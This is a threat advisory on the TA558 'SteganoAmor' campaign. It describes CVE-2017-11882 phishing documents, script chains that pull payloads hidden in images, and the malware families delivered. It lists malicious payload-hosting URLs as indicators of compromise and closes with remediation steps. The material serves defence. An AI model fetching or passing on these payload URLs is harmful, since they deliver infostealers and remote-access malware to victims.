Multiple Juniper Networks Products Vulnerabilities
April 17, 2024Multiple Apache Kafka and Solr Operator Vulnerabilities
April 17, 2024Multiple Juniper Networks Products Vulnerabilities
April 17, 2024Multiple Apache Kafka and Solr Operator Vulnerabilities
April 17, 2024Severity
High
Analysis Summary
The TA558 threat group has been employing steganography to hide malicious code in harmless images to infect targeted systems with multiple malware tools.
Steganography is the process of concealing data so that users and security products cannot discover it by enclosing it in seemingly innocent files. Since 2018, TA558 has been a recognized threat actor that targets travel and hotel businesses globally, with a particular emphasis on Latin America.
Security analysts uncovered the group's most recent effort, which it named "SteganoAmor" because of the heavy steganography used in it. In this campaign, the researchers found over 320 attacks that impacted different industries and nations.
“It uses long chains that incorporate a variety of tools and malware: Agent Tesla, FormBook, Remcos, LokiBot, Formbook, Guloader, Snake Keylogger, XWorm, and others,” warned the cybersecurity researchers.
The attack chain starts with malicious emails that appear to be harmless document attachments (Word and Excel files) and that take advantage of the CVE-2017-11882 vulnerability, a Microsoft Office Equation Editor vulnerability that was addressed in 2017 and is frequently exploited. Since the emails originate from reputable domains, there is less likelihood that they will be stopped when they are sent from compromised SMTP servers.
Upon viewing the file, the exploit will download a Visual Basic Script (VBS) from the legitimate paste-upon-opening-file service if an older version of Microsoft Office is installed. After that, this script is run to retrieve a JPG image file with a base-64 encoded payload within. The final payload, which is concealed inside a text file and is an executable with reverse base64 encoding, is downloaded using the PowerShell code included in the script included in the image. Cybersecurity experts have noticed multiple iterations of the attack chain, resulting in a wide range of malware families, such as:
- Agent Tesla: Spyware that records keystrokes, grabs information from the system clipboard, takes screenshots, and exfiltrates other private data. It also acts as a keylogger and credential thief.
- FormBook: An infostealer virus that gathers login credentials from several online browsers, records screen grabs, tracks and logs keystrokes, and can download and run files based on commands.
- Remcos: Malware that enables an attacker to take control of a compromised system remotely. It does this by executing commands, intercepting keystrokes, and activating the webcam and microphone for monitoring purposes.
- LokiBot: An info-stealer that targets information relating to numerous frequently used applications, including usernames, passwords, and other associated data.
- Guloader: A downloader used to spread secondary payloads that are usually compressed to avoid being detected by antivirus software.
- Snake Keylogger: A type of malware that records keystrokes, gathers information from the system clipboard, takes screenshots, and retrieves login credentials from web browsers.
- XWorm: A Remote Access Trojan (RAT) that allows the hacker to take remote control of the compromised system.
Malicious scripts and final payloads are frequently kept in reputable cloud services, such as Google Drive, using their positive reputation to avoid being detected by antivirus software. To make the traffic appear normal, stolen data is transmitted to legal FTP servers that have been infiltrated and are utilized as command-and-control (C2) infrastructure. Over 320 attacks were found by researchers, with the majority occurring in Latin American nations, while the attacks have a global reach.
Since TA558 uses a seven-year-old vulnerability in its attack chain, defense against SteganoAmor is quite simple by updating Microsoft Office to a more recent version to negate these attacks.
Impact
- Sensitive Data Theft
- Data Exfiltration
- Unauthorized Access
Indicators of Compromise
URL
- http://107.175.31.187/30008/ENIN.txt
- http://170.75.146.119/mokkhkhkhkhkhhkhk.txt
- http://bolandraf.com/prostutefiles/droibase64mohammedupdatedfile.txt
- http://bolandraf.com/prostutefiles/droidpedophylebase64.txt
- http://107.173.4.15/35005/HZA.txt
- http://107.175.113.216/xampp/krm/KRMC.txt
- http://107.175.31.187/21113/imageforlovers.jpg
- http://23.94.206.107/75099/pixelreturn.jpg
- http://104.247.204.205/microsoftdetecthistorycachecookieentirethingsfromthepcfordelete.Doc
- http://23.95.235.35/feelinggoodwithlovertounderstandhowmuchilovingherwithlotoflove___trulylovingtheheartwithlovertokissmehardtolove.doc
- http://192.3.95.131/www/OIOI0OIoioioi0oioII0IoioioiOIOIOioi000oi00oiOIOI0IOIo000000%23%23%23%23%23%23%23%23%23%23%23%23%23%230000000%23%23%23%23%23%23%23%23%23%23%23%23%23%23000000000..doc
Remediation
- Block all threat indicators at your respective controls.
- Search for Indicators of compromise (IOCs) in your environment utilizing your respective security controls.
- Do not download documents attached in emails from unknown sources and strictly refrain from enabling macros when the source isn’t reliable.
- Ensure that all systems, software, and applications are up-to-date with the latest security patches. Regularly check for and apply updates to eliminate known vulnerabilities that attackers could exploit.
- Educate employees about phishing emails, social engineering tactics, and safe online behavior. Effective training can reduce the likelihood of users inadvertently initiating an attack.
- Regularly back up critical data and systems to offline or isolated storage. Test the backup restoration process to ensure that it is effective in case of an attack.
- Deploy strong endpoint protection solutions that include advanced threat detection, behavior monitoring, and real-time protection against malware and ransomware.
- Employ robust email filtering and anti-phishing solutions to detect and prevent malicious attachments and links from reaching user inboxes.
- Conduct regular penetration testing and security assessments to identify vulnerabilities and weaknesses in your network and systems. Address any findings promptly.
- Thoroughly assess third-party vendors and software before integrating them into your environment. Ensure they have strong security practices and adhere to cybersecurity standards.